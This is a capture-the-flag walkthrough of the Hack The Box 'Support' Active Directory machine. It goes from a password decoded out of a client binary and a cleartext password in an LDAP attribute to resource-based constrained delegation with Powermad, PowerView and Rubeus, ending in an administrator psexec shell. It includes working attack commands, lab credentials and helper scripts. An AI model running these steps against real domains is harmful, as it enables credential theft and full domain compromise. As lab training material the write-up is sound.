SUPPORT – HACKTHEBOX

This is a writeup/walkthrough of the Support machine from Hack The Box, an Active Directory box: an LDAP bind password hidden in a client binary, a second password left in an LDAP attribute, and resource-based constrained delegation to reach Administrator on the DC.

nmap scan:

53/tcp  open  domain?       syn-ack
88/tcp  open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-08 06:33:49Z)
135/tcp open  msrpc         syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds? syn-ack
464/tcp open  kpasswd5?     syn-ack
593/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped    syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 19493/tcp): CLEAN (Timeout)
|   Check 2 (port 32384/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45724/udp): CLEAN (Timeout)
|   Check 4 (port 13515/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_smb2-time: Protocol negotiation failed (SMB2)

On SMB I found three shares. In the support-tools share I downloaded UserInfo.exe.zip, extracted all the files and opened UserInfo.exe in dnSpy. The decompiled code contains a hard-coded, obfuscated password for the LDAP bind user together with the key ("armando") and the routine that recovers it: base64-decode the blob, then XOR every byte with the key byte at the same position (the key repeats) and with the constant 223.

To recover the password I had ChatGPT turn that C# routine into the following Python:

import base64

# Values lifted from UserInfo.exe with dnSpy
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando"

def decrypt_password(enc_password=enc_password, key=key):
    # Same scheme as the C# getPassword(): base64-decode, then XOR each byte
    # with the key byte at that position (key cycles) and with 223
    decoded_password = base64.b64decode(enc_password)
    decrypted_bytes = bytearray(len(decoded_password))

    for i in range(len(decoded_password)):
        decrypted_bytes[i] = decoded_password[i] ^ ord(key[i % len(key)]) ^ 223

    return decrypted_bytes.decode('utf-8')

decrypted_password = decrypt_password()
print("Decrypted Password:", decrypted_password)

That gives the password of the ldap user. With it I collected the domain with bloodhound.py, but nothing stood out except that the user "support" can PSRemote into the DC.

./bloodhound.py -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174 --zip -c All

After uploading the zip into BloodHound: support has a CanPSRemote edge to DC.SUPPORT.HTB, so if I get the support user's credentials I get a WinRM shell on the domain controller itself (not Administrator yet, but a foothold on the DC).

Further enumeration gave no foothold as support, so I went back to LDAP and dumped the whole support.htb naming context (users, OUs, computers) with ldapsearch, binding as the ldap user; the support user's password turned out to be sitting in the directory.

ldapsearch -H ldap://10.10.11.174  -b "dc=support,dc=htb" -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' > ldap_search

I opened the dump in mousepad and searched for the common name "CN=support,CN=Users" (BloodHound had already shown that this user exists). The support object's info attribute holds the user's password in clear text. This is a common finding: administrators drop passwords into free-text attributes such as description, info or comment, and any authenticated domain user can read them.
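The ldapsearch dump is LDIF, and reading it by hand only works when you already know which user to look at. The following Python is an added example, not part of the original writeup: it parses ldapsearch output (folded continuation lines, "attr:: base64" values, comment lines) and flags note-style attributes (description, info, comment and similar) on every object whose value mentions a password or looks like one. The embedded LDIF is constructed sample data with made-up values, not the real output from the box; run it against the ldap_search file instead.

```python
import base64
import re

# Attribute names (lower-cased) where admins commonly leave free-text notes
NOTE_ATTRS = {"description", "info", "comment", "admindescription",
              "extensionattribute1", "extensionattribute2"}
# Heuristics: the text talks about a password/credential, or is one dense
# mixed-case token with digits and no whitespace (password-shaped)
PASSWORD_HINT = re.compile(r"pass(word|wd)?|pwd|cred", re.I)
TOKEN_LIKE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)\S{8,}$")


def parse_ldif(text):
    """Yield (dn, {attr: [values]}) for each entry in ldapsearch LDIF output.

    Handles folded continuation lines (leading space), 'attr:: <base64>'
    values and '#' comment lines. The trailing 'search:' / 'result:' lines
    have no dn and are dropped."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:      # continuation of previous line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    dn, attrs = None, {}
    for line in lines + [""]:                  # sentinel flushes the last entry
        if line == "":
            if dn is not None:
                yield dn, attrs
            dn, attrs = None, {}
            continue
        if line.startswith("#"):
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):              # 'attr:: <base64>'
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if attr == "dn":
            dn = value
        else:
            attrs.setdefault(attr, []).append(value)


def find_credential_candidates(ldif_text):
    """Return [(dn, attr, value)] for note-style attributes that look like credentials."""
    hits = []
    for dn, attrs in parse_ldif(ldif_text):
        for attr, values in attrs.items():
            if attr.lower() not in NOTE_ATTRS:
                continue
            for value in values:
                if PASSWORD_HINT.search(value) or TOKEN_LIKE.match(value):
                    hits.append((dn, attr, value))
    return hits


# Constructed sample in the shape of 'ldapsearch -b dc=support,dc=htb' output.
# Every value here is made up; it is not the real data from the box.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree

dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
cn: support
sAMAccountName: support
description: Shared support account
info: Temp.Pass123!

dn: CN=svc_backup,CN=Users,DC=support,DC=htb
objectClass: user
cn: svc_backup
sAMAccountName: svc_backup
description: Backup service account, see ticket #1234 for the
  rotation schedule
comment:: cGFzc3dvcmQgaXMgV2ludGVyMjAyMyE=

dn: CN=DC,OU=Domain Controllers,DC=support,DC=htb
objectClass: computer
sAMAccountName: DC$
description: Domain controller

search: 2
result: 0 Success
"""

if __name__ == "__main__":
    import sys
    # python3 ldap_creds.py ldap_search   (falls back to the sample above)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LDIF
    for dn, attr, value in find_credential_candidates(text):
        print(f"{dn}\n    {attr}: {value}")
```

On the sample it reports the info attribute of support and the base64-encoded comment of svc_backup, and nothing for the plain descriptions; the base64 branch matters because ldapsearch encodes any value with leading spaces or non-ASCII that way, which a plain grep for "pass" will miss.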

With the support password I logged in with evil-winrm, ran SharpHound.exe on the host and uploaded the new data to BloodHound. The shortest path to Domain Admin again only showed that support can PSRemote into DC.SUPPORT.HTB, which does not give me Administrator. Looking at the support node under Outbound Object Control > Group Delegated Object Control, support is a member of the Shared Support Accounts group, and that group has GenericAll over the computer object DC.SUPPORT.HTB.

GenericAll on a computer object means I can write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, i.e. configure resource-based constrained delegation (RBCD) so that a machine account I control may impersonate any user to services on the DC. To abuse this I uploaded Powermad.ps1, PowerView.ps1 and Rubeus.exe to the support user's Desktop folder (Powermad to create the machine account, PowerView for the ACL write, Rubeus for the tickets). Creating the machine account relies on ms-DS-MachineAccountQuota still being at its default of 10, which lets any domain user join up to ten computers.

Adding a new machine account to the domain, then pointing the DC's RBCD attribute at it:

# 1. Create a machine account we control (Powermad); the password is needed for Rubeus later
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
# 2. Look up the SID of the new computer object (PowerView)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
# 3. Build a security descriptor whose DACL grants that SID full control (SDDL rights CCDCLCSWRPWPDTLOCRSDRCWDWO)
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# 4. Write the binary descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on the DC's computer object (this is the write GenericAll allows)
Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
# 5. Derive the RC4 (NT) hash of the machine account's plaintext password for Rubeus
.\Rubeus.exe hash /password:Summer2018!

Copy the rc4 hash from the output, then use the Rubeus s4u module: it gets a TGT for attackersystem$ with that hash, performs S4U2Self to obtain a ticket for administrator to itself, and then S4U2Proxy to turn it into a service ticket for cifs/dc.support.htb as administrator, which the RBCD setting written above now permits; /ptt injects the ticket into the current session.

.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
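The RawSecurityDescriptor lines above produce a self-relative security descriptor, and once it is written the DC's computer object shows it in ldapsearch output as a base64 "msDS-AllowedToActOnBehalfOfOtherIdentity::" value. The following Python is an added example, not part of the original writeup or of any of the tools used: it builds the same bytes from a SID (owner BA, one ACCESS_ALLOWED ACE with the 0x000F01FF mask that the SDDL rights string expands to, no group, as in the O:BAD: string) and decodes them back, so you can confirm with ldapsearch that the attribute really contains your machine account's SID before running the S4U step. The SID in the usage block is a constructed example, not the box's real value.

```python
import base64
import struct

# Access mask equivalent to the SDDL rights string CCDCLCSWRPWPDTLOCRSDRCWDWO
FULL_CONTROL = 0x000F01FF
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"      # the "BA" in O:BA
SD_HEADER = "<BBHIIII"                       # rev, sbz1, control, owner/group/sacl/dacl offsets


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID (revision, count, 6-byte authority, LE sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("bad SID: %s" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf, off=0):
    """Decode a binary SID at buf[off]; returns (sid_string, byte_length)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_sd(allowed_sid):
    """Self-relative SD: owner BA, DACL = one ACCESS_ALLOWED_ACE giving allowed_sid full control."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    ace_sid = sid_to_bytes(allowed_sid)
    # ACE header (type, flags, size) + mask + SID
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(ace_sid), FULL_CONTROL) + ace_sid
    # ACL header: revision 2 (no object ACEs), sbz1, size, ace count, sbz2
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(ace), 1, 0) + ace
    owner_off = struct.calcsize(SD_HEADER)               # 20
    dacl_off = owner_off + len(owner)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)      # group and SACL absent
    return header + owner + acl


def parse_rbcd_sd(blob):
    """Decode a self-relative SD into {'control', 'owner', 'aces': [(sid, mask)]} (allow ACEs only)."""
    rev, _, control, owner_off, _group_off, _sacl_off, dacl_off = struct.unpack_from(SD_HEADER, blob, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    owner = bytes_to_sid(blob, owner_off)[0] if owner_off else None
    aces = []
    if control & SE_DACL_PRESENT and dacl_off:
        _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)
        pos = dacl_off + 8
        for _ in range(ace_count):
            ace_type, _flags, ace_size = struct.unpack_from("<BBH", blob, pos)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                (mask,) = struct.unpack_from("<I", blob, pos + 4)
                aces.append((bytes_to_sid(blob, pos + 8)[0], mask))
            pos += ace_size
    return {"control": control, "owner": owner, "aces": aces}


def sd_to_ldif_value(blob):
    """The form ldapsearch prints after 'msDS-AllowedToActOnBehalfOfOtherIdentity::'."""
    return base64.b64encode(blob).decode()


def decode_ldif_value(b64):
    """Paste the base64 from ldapsearch here to see who may act on behalf of the computer."""
    return parse_rbcd_sd(base64.b64decode(b64))


if __name__ == "__main__":
    # Constructed example SID (not the box's real attackersystem$ SID)
    blob = build_rbcd_sd("S-1-5-21-1677581083-3380853377-188903654-1234")
    print(sd_to_ldif_value(blob))
    print(decode_ldif_value(sd_to_ldif_value(blob)))
```

The check a practitioner wants is the decoded SID matching $ComputerSid and the mask being 0xF01FF; a different SID (for example a descriptor someone else already set) or a missing DACL means the S4U2Proxy step will fail with KDC_ERR_BADOPTION rather than anything more descriptive. The same function also shows what to restore afterwards: clearing the attribute and deleting attackersystem$ removes the backdoor.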

Rubeus prints the resulting service ticket as base64 .kirbi. I copied it into a file on my machine, base64-decoded it into a .kirbi file and converted that with impacket-ticketConverter into a ccache file.

With the ccache exported in KRB5CCNAME I used impacket-psexec with Kerberos authentication (-k -no-pass) as administrator against dc.support.htb; psexec.py is the same tool under its other name. Two things have to be right for this: the target must be given as the host name in the ticket's SPN (dc.support.htb, not the IP), and the attacking machine's clock must be within the default five-minute Kerberos skew of the DC (the nmap output above shows the server time).
